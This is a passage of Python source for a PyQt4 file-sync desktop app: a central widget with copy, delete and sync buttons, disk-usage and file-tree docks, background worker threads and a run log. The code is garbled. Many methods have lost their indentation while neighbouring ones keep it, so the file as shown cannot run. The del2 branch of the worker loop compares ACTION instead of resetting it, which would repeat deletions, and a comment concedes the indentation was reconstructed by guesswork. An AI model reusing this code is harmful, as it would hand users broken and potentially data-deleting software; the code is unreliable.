    dock1 = pyqtSignal()         # Disk Detail Signal
"""
Centre Widgets for MainWindow
"""
class centre(QWidget):
    def __init__(self):
        """Build the central widget: wires signals, restores pickled state,
        creates the UI, and starts the progress and file-action worker
        threads.  Setup success/failure is appended to the run log."""
        super(centre, self).__init__()
        log_file = open(rec_log, "a+")
        line = "\n\n\n\n-----------------------------------------------------------------------\n"
        log_file.writelines(line)
        line = "[" + str(time.asctime()) + "] program started setting up window\n"
        log_file.writelines(line)
        try:
            """
            Start handling dock2 treewidget signal
            -1: TreeWidget not Created
            0: Creating TreeWidget, No Signal Processed
            2: TreeWidget Created, Signal will be processed
            """
            self.start_handle1 = -1
            """
            Fetch Function Has Been Called or Not
            0: Not Called
            1: Straight Fetch Called
            2: Reverse Fetch Called
            """
            self.fetched = 0
            #Connecting Signals To Handlers
            self.sig = signal()
            self.sig.prog_bar.connect(lambda: self.update_progbar())
            self.sig.prog_lab.connect(lambda: self.update_proglab())
            self.sig.stat_bar.connect(lambda: self.update_statbar())
            #self.sig.text_browser.connect(lambda: self.update_text1())
            self.sig.dock1.connect(lambda: self.make_dock1())
            #Load Pickled Lists
            self.loadlist()
            #Create Centre Widgets
            self.set_centre()
            # text_browser connected only after set_centre so the browser exists
            self.sig.text_browser.connect(lambda: self.update_text1())
            #Get Functions From MainWindow
            self.get_functions()
            #Update Dock3 with Source Folder
            self.update_dock3()
            #Thread to Update ProgressBar, StatusBar, Progress Label and Disk Detail
            self.prog_thread = threading.Thread(target = self.start_thread, args = ())
            self.prog_thread.daemon = True
            self.prog_thread.start()
            #Thread To Perform File Actions
            self.action_thread = threading.Thread(target = self.file_action, args = ())
            self.action_thread.daemon = True
            self.action_thread.start()
            line = "[" + str(time.asctime()) + "] window set up completed successfully\n\n"
            log_file.writelines(line)
            log_file.close()
        except:
            # NOTE(review): bare except hides the failure cause from the user;
            # only the log records that setup failed.
            line = "[" + str(time.asctime()) + "] failed to setup window!!!CLOSING\n\n"
            log_file.writelines(line)
            log_file.close()
def loadlist(self):
try:
list1 = pickle.load(open("setting/all_list.p", "rb"))
list2 = pickle.load(open("setting/list_name.p", "rb"))
list3 = pickle.load(open("setting/left_check.p", "rb"))
list4 = pickle.load(open("setting/top_check.p", "rb"))
for item in list1:
all_list.append(item) #Variable at Line 81 in env
for item in list2:
list_name.append(item) #Variable at Line 83 in env
for item in list3:
left_check.append(item) #Variable at Line 76 in env
for item in list4:
top_check.append(item) #Variable at Line 78 in env
self.make_synclist()
except:
print(sys.exc_info())
pass
"""
TEXT1[0] = "Press A Button To Start Any Job"
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
"""
    def make_synclist(self):
        """Rebuild the global sync_list from the entries whose top checkbox
        is ticked, refresh the reverse-copy list, and show a prompt when no
        locations remain defined."""
        tmp_list = []
        i = 0
        while(i < len(all_list)):
            j = 0
            while(j < len(all_list[i])):
                #If Checked add to sync list
                if(top_check[i][j] == 1):
                    tmp_list.append(all_list[i][j])
                j = j + 1
            i = i + 1
        #sync_list.clear()
        #sync_list = []
        clear_list([sync_list]);
        for item in tmp_list:
            sync_list.append(item)
        self.make_rev_list() #Make List For Reverse Copy
        if(len(sync_list) == 0):
            # no locations ticked: prompt the user via status bar and text box
            TEXT3[0] = "No Locations Defined"
            self.sig.stat_bar.emit()
            TEXT1[0] = "Define Locations"
            BOX_TEXT.append(TEXT1[0])
            self.sig.text_browser.emit()
    def get_functions(self):
        """Borrow dock-3 helper callables from `central`.
        NOTE(review): `central` is assumed to come from one of the star
        imports (likely wrapper) — confirm which module defines it."""
        #Update Dock3
        self.update_right_dock = getattr(central, "update_right_dock")
        #Lock Dock3 when file operations going on
        self.lock_right = getattr(central, "lock_right")
    def set_centre(self):
        """Create all central widgets: the action button row, the two docks
        (disk details, file-type trees), the log text box and the progress
        label/bar, and lay them out in a grid."""
        dictionary = QPushButton("LOCATION")
        self.make_button(dictionary, "", "", self.dict)
        dictionary.setMinimumHeight(50)
        self.fetch1 = QPushButton("FETCH")
        self.make_button(self.fetch1, "", "", self.fetch_btn)
        self.fetch1.setMinimumHeight(50)
        self.copy1 = QPushButton("COPY 1-2")
        self.make_button(self.copy1, "", "", self.copy12)
        self.copy1.setMinimumHeight(50)
        self.copy2 = QPushButton("COPY 2-1")
        self.make_button(self.copy2, "", "", self.copy21)
        self.copy2.setMinimumHeight(50)
        self.del1 = QPushButton("DELETE 1")
        self.make_button(self.del1, "", "", self.delete1)
        self.del1.setMinimumHeight(50)
        self.del2 = QPushButton("DELETE 2")
        self.make_button(self.del2, "", "", self.delete2)
        self.del2.setMinimumHeight(50)
        self.sync1 = QPushButton("SYNC")
        self.make_button(self.sync1, "", "", self.sync)
        self.sync1.setMinimumHeight(50)
        log = QPushButton("LOG")
        self.make_button(log, "", "", self.log)
        log.setMinimumHeight(50)
        #Set StyleSheet
        but_obj = [dictionary, self.fetch1, self.copy1, self.copy2, self.del1, self.del2, self.sync1, log]
        set_style(but_obj, "button")
        # dock1: disk usage details; dock2: file-type trees (copy/delete tabs)
        self.dock1 = QDockWidget("", self)
        self.dock1.setFeatures(QDockWidget.NoDockWidgetFeatures)
        self.make_dock1()
        self.dock2 = QDockWidget("", self)
        self.dock2.setFeatures(QDockWidget.NoDockWidgetFeatures)
        self.make_dock2()
        self.text_box = QTextBrowser()
        set_style(self.text_box, "text_browser")
        self.progress_text = QLabel("\t| COPY | Files: 000/000\tAmount: 0000/0000(MB)\t\t\t| DELETE | Files: 000/000\tAmount: 0000/0000(MB)")
        set_style(self.progress_text, "prog_lab")
        self.pbar = QProgressBar(self)
        set_style(self.pbar, "prog_bar")
        self.pbar.setValue(0)
        self.progress_text.setMaximumHeight(20)
        self.pbar.setMaximumHeight(25)
        # button row on top, docks/text box in the middle, progress at bottom
        grid = QGridLayout()
        grid.setSpacing(0)
        grid.addWidget(dictionary, 0, 0)
        grid.addWidget(self.fetch1, 0, 1)
        grid.addWidget(self.copy1, 0, 2)
        grid.addWidget(self.copy2, 0, 3)
        grid.addWidget(self.del1, 0, 4)
        grid.addWidget(self.del2, 0, 5)
        grid.addWidget(self.sync1, 0, 6)
        grid.addWidget(log, 0, 7)
        grid.addWidget(self.dock1, 3, 0, 5, 4)
        grid.addWidget(self.dock2, 3, 4, 9, 4)
        grid.addWidget(self.text_box, 8, 0, 4, 4)
        grid.addWidget(self.progress_text, 12, 0, 1, 8)
        grid.addWidget(self.pbar, 13, 0, 1, 8)
        self.setLayout(grid)
        TEXT3[0] = "Press A Button To Start Any Job"
        self.sig.stat_bar.emit()
    def update_sec_dock(self, action):
        """Rebuild the dock-2 tree for *action* ("copy" or "del"): refresh the
        per-category file lists, then populate the tree with one checkable
        heading per file type and one checkable row per file.  Signal handling
        is suspended (start_handle1 = 0) while the tree is rebuilt."""
        self.start_handle1 = 0 #Stop Processing Signals emitted due to change in treewidget
        if(action == "copy"):
            tree = self.tree2
            file_cat = cp_filetype #Variable at Line 27 in env2
            #left_cp_obj.clear()
            #left_cp_obj = []
            clear_list([left_cp_obj]);
            obj_list = left_cp_obj #Variable at Line 87 in env
            #cp_map.clear()
            #cp_map = []
            clear_list([cp_map]);
            maps = cp_map #Variable at Line 92 in env
        if(action == "del"):
            tree = self.del_tree
            file_cat = del_filetype #Variable at Line 30 in env2
            #left_del_obj.clear()
            #left_del_obj = []
            clear_list([left_del_obj]);
            obj_list = left_del_obj #Variable at Line 88 in env2
            #del_map.clear()
            #del_map= []
            clear_list([del_map]);
            maps = del_map #Variable at Line 93 in env2
        if(action == "copy"):
            for i in range(len(cp_filetype)):
                #cp_filetype[i].clear()
                #cp_filetype[i] = []
                clear_list([cp_filetype[i]]);
            make_fcategory(self, cp_file_from, "copy") #Function at Line 22 in make_dock2
        if(action == "del"):
            for i in range(len(del_filetype)):
                #del_filetype[i].clear()
                #del_filetype[i] = []
                clear_list([del_filetype[i]]);
            make_fcategory(self, del_file_from, "del") #Function at Line 22 in make_dock2
        tree.clear()
        i = 0
        for item in file_cat:
            out_list = []
            out_map = []
            # heading shows the category name plus its file count
            heading = type_name[i] + "(" + str(len(file_cat[i])) + ")"
            head = QTreeWidgetItem(tree, [heading])
            out_list.append(head)
            out_map.append(-1)  # -1 marks a heading row in the map
            head.setCheckState(0, Qt.Checked)
            head.setExpanded(True)
            if(len(item) == 0):
                # empty category: grey out and untick the heading
                head.setDisabled(True)
                head.setCheckState(0, Qt.Unchecked)
            for fname in file_cat[i]:
                # human-readable size with one decimal digit
                # NOTE(review): these ifs are not elif, so the "Bytes" branch
                # is always overwritten by the KB branch for sizes < 1000,
                # and a size of exactly 1000000 keeps unit "" and an integer
                # value, which makes the '.'-split below raise IndexError.
                size = fname[1]
                unit = ""
                if size < 1000:
                    size = size
                    unit = "Bytes"
                if size < 1000000:
                    size = size / 1000
                    unit = "KB"
                if size > 1000000:
                    size = size / 1000000
                    unit = "MB"
                tmp_size = str(size)
                tmp_size = tmp_size.split('.')
                fsize = tmp_size[0] + '.' + tmp_size[1][:1] + unit
                tail = QTreeWidgetItem(head, [fname[0], fsize, fname[2]])
                out_list.append(tail)
                out_map.append(fname[3])
                tail.setCheckState(0, Qt.Checked)
            obj_list.append(out_list)
            maps.append(out_map)
            i = i + 1
        self.start_handle1= 2 #Start Processing changes made to treewidget
    def make_dock1(self):
        """(Re)build the disk-details dock: one progress bar (percent used)
        plus a Total/Used/Available label per disk in disk_info."""
        frame = QFrame()
        frame.setFrameShape(QFrame.StyledPanel)
        grid = QGridLayout()
        # refresh disk_info; NOTE(review): the class `centre` (not self) is
        # passed here — confirm show_disk really expects the class object.
        show_disk(centre)
        i = 0
        j = 0
        while i < len(disk_info):
            detail = ""
            disk_label = QLabel(disk_info[i][0])
            disk_label.setStyleSheet("QLabel {font : Normal 14px 'Serif'; color : rgb(86, 90, 85); background-color : 0;}")
            disk_label.setMaximumWidth(150)
            bar = QProgressBar()
            set_style(bar, "disk_bar")
            # bar value = used/total as a percentage
            bar.setValue((disk_info[i][2] / disk_info[i][1]) * 100)
            # keep one decimal digit of each GB figure
            total = str(disk_info[i][1]).split('.')
            total = total[0] + "." + total[-1][:1]
            used = str(disk_info[i][2]).split('.')
            used = used[0] + "." + used[-1][:1]
            avail = str(disk_info[i][3]).split('.')
            avail = avail[0] + "." + avail[-1][:1]
            detail = "Total: " + total + "GB Used: " + used + "GB Available: " + avail + "GB"
            det = QLabel(detail)
            det.setStyleSheet("QLabel {font : Normal 12px 'Monospace'; color : rgb(38, 97, 94);}")
            det.setMaximumHeight(10)
            # two grid rows per disk: the bar+name, then the detail line
            grid.addWidget(bar, j, 0, 1, 6)
            grid.addWidget(disk_label, j, 1)
            j = j + 1
            grid.addWidget(det, j, 0)
            j = j + 1
            i = i + 1
        space = QLabel("\n\n\n\n")
        grid.addWidget(space, j, 0)
        frame.setLayout(grid)
        self.dock1.setWidget(frame)
def update_dock3(self):
if(len(sync_list) == 0):
return
tmp = []
for item in sync_list:
tmp.append(item['source'])
tmp.sort()
self.update_right_dock(self, tmp, "copy")
self.update_right_dock(self, tmp, "del")
    def make_button(self, item, text = "", icon = None, handle = None):
        """Attach an icon and a clicked-handler to *item* (a QPushButton).
        `text` is currently unused.  Callers in set_centre pass "" for
        *icon*; NOTE(review): the default icon=None would hand None to
        QIcon() — confirm PyQt4 tolerates that before relying on defaults."""
        item.setIcon(QIcon(icon))
        item.setIconSize(QSize(50, 50))
        item.connect(item, SIGNAL("clicked()"), handle)
    def make_dock2(self):
        """Build the dock-2 tab widget holding the two checkable trees:
        "FILES TO COPY" (self.tree2) and "FILES TO DELETE" (self.del_tree),
        then populate both via update_sec_dock."""
        self.dock2.setMaximumWidth(500)
        self.dock2.setMinimumWidth(500)
        self.dock2.setObjectName("Log Dock")
        self.dock2.isEnabled
        self.tree2 = QTreeWidget()
        self.tree2.setFocusPolicy(Qt.NoFocus)
        set_style(self.tree2, "tree")
        self.tree2.setHeaderHidden(True)
        self.tree2.setColumnCount(3)  # name / size / date columns
        self.tree2.setColumnWidth(0, 300)
        self.tree2.setColumnWidth(1, 80)
        self.tree2.setColumnWidth(2, 80)
        # check-state changes are routed to the common tick handler
        self.tree2.itemChanged.connect(lambda ob = self : self.left_tick_handle(ob, "copy"))
        self.del_tree = QTreeWidget()
        self.del_tree.setFocusPolicy(Qt.NoFocus)
        set_style(self.del_tree, "tree")
        self.del_tree.setHeaderHidden(True)
        self.del_tree.itemChanged.connect(lambda ob = self : self.left_tick_handle(ob, "del"))
        self.del_tree.setColumnCount(3)
        self.del_tree.setColumnWidth(0, 260)
        tab = QTabWidget()
        tab.setFocusPolicy(Qt.NoFocus)
        tab1 = QWidget()
        tab2 = QWidget()
        txt1 = "FILES TO COPY"
        txt2 = "FILES TO DELETE"
        tab.addTab(tab1, txt1)
        tab.addTab(tab2, txt2)
        #Set StyleSheet
        set_style(tab, "left_tab")
        cp_grid = QGridLayout()
        del_grid = QGridLayout()
        cp_grid.addWidget(self.tree2, 0, 0)
        del_grid.addWidget(self.del_tree, 0, 0)
        tab1.setLayout(cp_grid)
        tab2.setLayout(del_grid)
        self.dock2.setWidget(tab)
        # initial fill of both trees
        self.update_sec_dock("copy")
        self.update_sec_dock("del")
def left_tick_handle(self, ob, action):
    # Dock2 (left) tree check-box handler.  obj_list groups items per
    # folder as [head, tail, tail, ...]: index 0 is the folder row, the
    # rest are its files.  A tick on a head propagates to every tail; a
    # tick on a tail updates the TOT_*_FILE counter and (when it is the
    # first/last checked tail) the head.  File-level changes are mirrored
    # into dock3 via handle_right().
    # NOTE(review): indentation below was reconstructed from a
    # whitespace-stripped source -- verify nesting against the original.
    if(self.start_handle1 == 2):
        if(action == "copy"):
            tree = self.tree2
            obj_list = left_cp_obj #Variable at Line 87 in env
            TOT_FILE = TOT_CP_FILE #Variable at Line 16 in env_progress
        if(action == "del"):
            tree = self.del_tree
            obj_list = left_del_obj #Variable at Line 87 in env
            TOT_FILE = TOT_DEL_FILE #Variable at Line 7 in env_progress
        tree.blockSignals(True) #Block Other Signals to tree
        out_len = len(obj_list)
        outer_index = 0
        flag = 0
        in_index = 0
        #Finding index of the object in object_list
        while(outer_index < out_len):
            in_index = 0
            in_len = len(obj_list[outer_index])
            while(in_index < in_len):
                if(obj_list[outer_index][in_index] == ob):
                    flag = 1
                    break
                in_index = in_index + 1
            if(flag):
                break
            outer_index = outer_index + 1
        if(in_index == 0): #It is a head and checked
            if(ob.checkState(0) == Qt.Checked):
                obj_list[outer_index][0].setCheckState(0, Qt.Checked)
                size = len(obj_list[outer_index])
                i = 1
                #Check Every Tail
                while(i < size):
                    if(obj_list[outer_index][i].checkState(0) == Qt.Unchecked):
                        obj_list[outer_index][i].setCheckState(0, Qt.Checked)
                        TOT_FILE[0] = TOT_FILE[0] + 1
                        self.handle_right(obj_list[outer_index][i], action) #Reflect change to Tree in Dock3 func at Line 431
                    i = i + 1
                tree.blockSignals(False) #No more block signals from tree
                return
            if(ob.checkState(0) == Qt.Unchecked): #It is a head and unchecked
                obj_list[outer_index][0].setCheckState(0, Qt.Unchecked)
                size = len(obj_list[outer_index])
                i = 1
                #Uncheck Every Tail
                while(i < size):
                    if(obj_list[outer_index][i].checkState(0) == Qt.Checked):
                        obj_list[outer_index][i].setCheckState(0, Qt.Unchecked)
                        TOT_FILE[0] = TOT_FILE[0] - 1
                        self.handle_right(obj_list[outer_index][i], action) #Reflect change to Tree in Dock3 func at Line 431
                    i = i + 1
                tree.blockSignals(False) #No more block signals from tree
                return
        if(ob.checkState(0) == Qt.Checked): #It is Tail and Checked
            if(obj_list[outer_index][0].checkState(0) == Qt.Unchecked):
                obj_list[outer_index][0].setCheckState(0, Qt.Checked)
            TOT_FILE[0] = TOT_FILE[0] + 1
            self.handle_right(ob, action) #Reflect change to Tree in Dock3 func at Line 431
            tree.blockSignals(False) #No more block signals from tree
            return
        if(ob.checkState(0) == Qt.Unchecked): #It is Tail and Unchecked
            TOT_FILE[0] = TOT_FILE[0] - 1
            size = len(obj_list[outer_index])
            i = 1
            flag = 0
            #Check If all tail of this head are unchecked
            while i < size:
                if(obj_list[outer_index][i].checkState(0) == Qt.Checked):
                    flag = 1
                    break
                i = i + 1
            if(not flag): #All tails are Unchecked
                obj_list[outer_index][0].setCheckState(0, Qt.Unchecked)
            self.handle_right(ob, action) #Reflect change to Tree in Dock3 func at Line 431
            tree.blockSignals(False) #No more block signals from tree
            return
"""
It reflect changes made in dock2 to dock3 by calling dock3 handler function
"""
def handle_right(self, ob, action):
if(action == "copy"):
left = left_cp_flist #Variable at Line 100 in env
right = right_cp_flist #Variable at Line 104 in env
file_from = cp_file_from #Variable at Line 43 in env
F_SIZE = TOT_CP_AMT #Variable at Line 20 in env_progress
if(action == "del"):
left = left_del_flist #Variable at Line 101 in env
right = right_del_flist #Variable at Line 105 in env
file_from = del_file_from #Variable at Line 50 in env
F_SIZE = TOT_DEL_AMT #Variable at Line 11 in env_progress
i = 0
#Search index of object in object list
size = len(left)
while(i < size):
if(left[i] == ob):
break
i = i + 1
s = os.path.getsize(file_from[i])
if(left[i].checkState(0) == Qt.Checked):
F_SIZE[0] = F_SIZE[0] + s / 1000000
right[i].setCheckState(0, Qt.Checked) #Right treewidget handler called
if(left[i].checkState(0) == Qt.Unchecked):
F_SIZE[0] = F_SIZE[0] - s / 1000000
right[i].setCheckState(0, Qt.Unchecked) #Right treewidget handler called
text4 = ("\t<COPY>Files: 000/%d\tAmount: 0000/%d(MB)\t\t\t<DELETE>Files: 000/%d\tAmount: 0000/%d(MB)" %(TOT_CP_FILE[0], TOT_CP_AMT[0], TOT_DEL_FILE[0], TOT_DEL_AMT[0]))
TEXT2[0] = text4
self.sig.prog_lab.emit()
TEXT3[0] = ("%d Files To Copy and %d Files To Delete" %(TOT_CP_FILE[0], TOT_DEL_FILE[0]))
self.sig.stat_bar.emit()
"""
Update window when there is no file to copy or delete
"""
def nofile(self):
#Update Dock3 With Source Folder Only
tmp = []
for item in sync_list:
tmp.append(item['source'])
tmp.sort()
self.update_right_dock(self, tmp, "copy")
self.update_right_dock(self, tmp, "del")
self.update_sec_dock("copy")
self.update_sec_dock("del")
TEXT3[0] = "No Files To Take Action"
TEXT1[0] = "No Files Left To Perform Next Task"
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
self.sig.stat_bar.emit()
"""
If there is no item in dictionary to fetch files from
"""
def target_empty(self, fetch_list):
if(len(fetch_list) == 0):
self.clear_list()
inst = central()
self.update_right_dock(inst, cp_file_from, "copy")
self.update_right_dock(inst, del_file_from, "del")
self.update_sec_dock("copy")
self.update_sec_dock("del")
TEXT1[0] = "Define Locations With LOCATION Button On Left"
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
line = "------------------------------------------------------"
TEXT1[0] = line
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
TEXT3[0] = "No Locations Defined"
self.sig.stat_bar.emit()
return 0
return 1
"""
List required to be cleared for fetching process otherwise lists will be appended
List Variable at Line 55 in env
"""
def clear_list(self):
list_size = len(lists)
for i in range(list_size):
#lists[i].clear()
#lists[i] = []
clear_list([lists[i]]);
def fetch_btn(self):
    # Toolbar handler: run a forward (source -> target) fetch.
    self.call_fetch_btn(1)
def call_fetch_btn(self, i):
    # Confirm with the user, clear the per-fetch lists, then set the
    # FETCH / ACTION environment variables so the file_action worker
    # thread performs the fetch.
    #   i == 1 -> fetch sync_list (forward)
    #   i == 2 -> fetch rev_list (reversed)
    msg = "Are You Sure To Start\nFetching Process"  # fixed typo: was "Fetchin"
    reply = QMessageBox.question(self, 'Message', msg, QMessageBox.Yes, QMessageBox.No)
    if(reply == QMessageBox.No):
        return
    self.clear_list() #Clear lists required to store file and directory names
    if(i == 1):
        if(not self.target_empty(sync_list)): #Check If There is no location in dictionary
            return
        FETCH[0] = i
        ACTION[0] = "fetch1"
    if(i == 2):
        if(not self.target_empty(rev_list)): #Check If There is no location in dictionary
            return
        FETCH[0] = i
        ACTION[0] = "fetch2"
    self.show_busy()
    self.after_fetch()
def after_fetch(self):
    # Post-fetch UI refresh: rebuild both docks and the dock2<->dock3
    # object mappings, then publish fetch-result summaries to the progress
    # label, text browser, status bar and the session log file.
    os.chdir(curr)
    self.update_right_dock(self, cp_file_from, "copy")
    self.update_right_dock(self, del_file_from, "del")
    self.update_sec_dock("copy")
    self.update_sec_dock("del")
    self.make_mapping("copy")
    self.make_mapping("del")
    TEXT2[0] = ("\t<COPY>Files: 000/%d\tAmount: 0000/%d(MB)\t\t\t<DELETE>Files: 000/%d\tAmount: 0000/%d(MB)" %(TOT_CP_FILE[0], TOT_CP_AMT[0], TOT_DEL_FILE[0], TOT_DEL_AMT[0]))
    self.sig.prog_lab.emit()
    line = "------------------------------------------------------"
    TEXT1[0] = line
    BOX_TEXT.append(TEXT1[0])
    self.sig.text_browser.emit()
    text1 = str(len(dir2cp)) + " Folders and " + str(len(file2cp)) + " Files To Copy"
    TEXT1[0] = text1
    BOX_TEXT.append(TEXT1[0])
    self.sig.text_browser.emit()
    text2 = str(len(del_dir_from)) + " Folders and " + str(len(del_file_from)) + " Files To Delete"
    TEXT1[0] = text2
    BOX_TEXT.append(TEXT1[0])
    self.sig.text_browser.emit()
    TEXT1[0] = line
    BOX_TEXT.append(TEXT1[0])
    self.sig.text_browser.emit()
    text3 = str(TOT_CP_AMT[0]) + " MB" + " To Copy and "
    text4 = str(TOT_DEL_AMT[0]) + " MB" + " To Delete"
    TEXT3[0] = text3 + text4
    self.sig.stat_bar.emit()
    # Append the same summary to the persistent log file.
    log_file = open(rec_log, "a+")
    line = "[" + str(time.asctime()) + "] " + text1 + " and " + text2 + "\n"
    log_file.writelines(line)
    log_file.close()
#Copy from source to target
def copy12(self):
    # Validate locations, auto-fetch if a forward fetch has not been done,
    # confirm with the user, resolve collisions, then hand the copy job to
    # the file_action thread via ACTION.
    if(not self.target_empty(sync_list)): #If copy button pressed before fetch button this will do location check
        return
    if(self.fetched != 1): #If straight fetch not done
        self.fetched = 1
        self.call_fetch_btn(1) #Fetch
    if(not cp_file_from): #If no files to copy
        self.nofile() #Update Window
        return
    msg = "Are You Sure To Start The Copying Process?"
    reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
    if(reply == QMessageBox.No):
        return
    if(col_cp_src):
        self.col_care()
    ACTION[0] = "copy12" #Sets environment variable for file action thread to start copy process
#Delete At Target
def delete1(self):
    # Same flow as copy12, but queues deletion of extra items at target.
    if(not self.target_empty(sync_list)):
        return
    if(self.fetched != 1):
        self.fetched = 1
        self.call_fetch_btn(1)
    if(not del_file_from):
        self.nofile()
        return
    msg = "Are You Sure To Delete Extra Items From Target?"
    reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
    if(reply == QMessageBox.No):
        return
    ACTION[0] = "del1"
#Copy from Target to source
def copy21(self):
    # Reversed copy (target -> source); requires a reversed fetch (i == 2).
    if(not self.target_empty(sync_list)):
        return
    if(self.fetched != 2):
        self.fetched = 2
        self.call_fetch_btn(2)
    if(not cp_file_from):
        self.nofile()
        return
    msg = "Are You Sure To Start The Reversed Copying Process?"
    reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
    if(reply == QMessageBox.No):
        return
    if(col_cp_src):
        self.col_care()
    ACTION[0] = "copy21"
#Delete At Source
def delete2(self):
    # Reversed delete: removes extra items from the source side.
    if(not self.target_empty(sync_list)):
        return
    if(self.fetched != 2):
        self.fetched = 2
        self.call_fetch_btn(2)
    if(not del_file_from):
        self.nofile()
        return
    msg = "Are You Sure To Delete Extra Item From Source?"
    reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
    if(reply == QMessageBox.No):
        return
    ACTION[0] = "del2"
"""
files in copy12 is same as del2
files in copy21 is same as del1
"""
"""
Thread that checks ACTION environment variable every 1 second
and perform action if it is set
"""
def file_action(self):
while True:
if(ACTION[0] == "fetch1"):
self.on_fetch(sync_list)
ACTION[0] = " "
BUSY[0] = " "
continue
if(ACTION[0] == "fetch2"):
self.on_fetch(rev_list)
ACTION[0] = " "
BUSY[0] = " "
continue
if(ACTION[0] == "copy12"):
self.lock_widgets("lock")
mkdir(self, dir2cp)
cp(self, file2cp, cp_file_from)
ACTION[0] = " "
self.lock_widgets("unlock")
self.copy1.setFocus()
continue
if(ACTION[0] == "copy21"):
self.lock_widgets("lock")
mkdir(self, dir2cp)
cp(self, file2cp, cp_file_from)
ACTION[0] = " "
self.lock_widgets("unlock")
self.copy2.setFocus()
continue
if(ACTION[0] == "del1"):
self.lock_widgets("lock")
rm(self, del_file_from)
rmdir(self, del_dir_from)
ACTION[0] = " "
self.lock_widgets("unlock")
self.del1.setFocus()
continue
if(ACTION[0] == "del2"):
self.lock_widgets("lock")
rm(self, del_file_from)
rmdir(self, del_dir_from)
ACTION[0] == " "
self.lock_widgets("unlock")
self.del2.setFocus()
continue
time.sleep(1)
def show_busy(self):
    # Show the frameless, white "busy" splash dialog near the centre of
    # the available desktop area.  exec_() is modal: it blocks until the
    # splash closes itself.
    self.splash = busy()
    self.splash.resize(150, 150)
    desktopRect = QApplication.desktop().availableGeometry(self);
    middle = desktopRect.center();
    self.splash.move(middle.x() - 200 * 0.5, middle.y() - 200);
    pal = QPalette()
    pal.setColor(QPalette.Background, Qt.white)
    self.splash.setPalette(pal)
    self.splash.setWindowFlags(Qt.FramelessWindowHint)
    self.splash.exec_()
def col_care(self):
    """Collect the indices (into cp_file_from) of colliding copy-source
    files that are still check-marked in dock2, untick them, then pop the
    collision-confirmation dialog."""
    conf_res.clear()
    i = 0
    j = 0
    size = len(col_cp_src)
    # col_cp_src lists the colliding paths in the same order they appear
    # in cp_file_from, so advance j through cp_file_from to locate each.
    while(i < size):
        if(col_cp_src[i] == cp_file_from[j]):
            if(left_cp_flist[j].checkState(0) == Qt.Unchecked):
                i = i + 1
                j = j + 1
                continue
            conf_res.append(j)
            i = i + 1
            j = j + 1
            continue
        j = j + 1
    if(not conf_res):
        return
    # BUG FIX: this loop previously ran len(col_cp_src) times while indexing
    # conf_res, raising IndexError whenever some collisions were already
    # unchecked (conf_res shorter than col_cp_src).  Iterate conf_res itself.
    for idx in conf_res:
        left_cp_flist[idx].setCheckState(0, Qt.Unchecked)
    self.get_conf()
def get_conf(self):
    # Modal collision-confirmation dialog (cp_conf) over a white palette.
    conf = cp_conf()
    conf.setWindowTitle("File Collision Found")
    conf.resize(350, 400)
    pal = QPalette()
    pal.setColor(QPalette.Background, Qt.white)
    conf.setPalette(pal)
    conf.exec_()
"""
Locke centre widgets when file action is going on
and unlock it when completed
"""
def lock_widgets(self, action):
if(action == "lock"):
self.tree2.setDisabled(True)
self.del_tree.setDisabled(True)
self.fetch1.setDisabled(True)
self.copy1.setDisabled(True)
self.copy2.setDisabled(True)
self.del1.setDisabled(True)
self.del2.setDisabled(True)
self.sync1.setDisabled(True)
self.lock_right(self, "lock") #Lock dock3
if(action == "unlock"):
self.tree2.setEnabled(True)
self.fetch1.setEnabled(True)
self.copy1.setEnabled(True)
self.copy2.setEnabled(True)
self.del1.setEnabled(True)
self.del2.setEnabled(True)
self.sync1.setEnabled(True)
self.del_tree.setEnabled(True)
self.lock_right(self, "unlock") #Unlock dock3
"""
Make reverse sync list for copy21 and del2
"""
def make_rev_list(self):
#rev_list.clear()
#rev_list = []
clear_list([rev_list]);
for item in sync_list:
#Swap dictionary values
tmp = {'source': "", 'target' : ""}
tmp['source'] = item['target']
tmp['target'] = item['source']
rev_list.append(tmp)
def sync(self):
if(not self.target_empty(sync_list)):
return
self.copy12()
self.delete1()
"""
Location Window Handler
"""
def dict(self):
if(len(all_list) == 0): #If There is no device add a device
text, ok = QInputDialog.getText(self, 'Input Dialog', 'Add a Device(Enter Name of Device):')
if(ok):
list_name.append(text)
all_list.append([{'source' : "", 'target' : ""}])
top_check.append([0])
left_check.append(0)
else:
return
top = set_dict()
top.setWindowTitle("Select Locations")
top.resize(900, 600)
top.exec_()
loc_changed = [0]
if(loc_changed[-1] == 1): #If changes made in location window
if(ACTION[0] == " "):
self.fetched = 1
self.call_fetch_btn(1)
log_file = open(rec_log, "a+")
line = "[" + str(time.asctime()) + "] locations dictionary changed\n"
log_file.writelines(line)
log_file.close()
#loc_changed.clear()
#loc_changed = []
clear_list([loc_changed]);
loc_changed.append(0)
self.make_rev_list()
"""
Progress Thread Handler
Checks if any action going on every 1 seconds
"""
def start_thread(self):
i = 0
while True:
if(ACTION[0] != " "):
#Calls function if file action going on
self.progress_thread()
continue
#Update Dock1 Every 5 seconds
if(i == 5):
self.sig.dock1.emit()
i = 0
time.sleep(1)
i = i + 1
"""
Update Progress and Dock1 untill file action goes on
"""
def progress_thread(self):
#If action is copy
if(ACTION[0] == "copy12" or ACTION[0] == "copy21"):
prev = 0
avg = 0
i = 1
while True:
if(ACTION[0] == " "): #If action completed but progress bar is not 100% due to time lag among two threads
if(VAL[0] != 100):
VAL[0] = 100
TEXT2[0] = ("\tFiles: %d/%d\tAmount: %d/%d(MB)\t\t\t\t\t\tElapsed: %d:%d\tAvg. Speed: %dMBPS" %(CP_FILE[0], TOT_CP_FILE[0], SIZE_COPIED[0], TOT_CP_AMT[0], mins, secs, avg_speed))
TEXT3[0] = "Copying: '%s'(%d/%d)MB 100%%" %(CURR_NAME[0], CURR_SIZE[0], CURR_SIZE[0])
self.sig.prog_bar.emit()
self.sig.prog_lab.emit()
self.sig.stat_bar.emit()
AVG_SPEED[0] = avg_speed
return
try:
cp_amt = (os.path.getsize(CURR_FILE[0])) / 1000000 #Find amount copied for current file
except:
cp_amt = 0
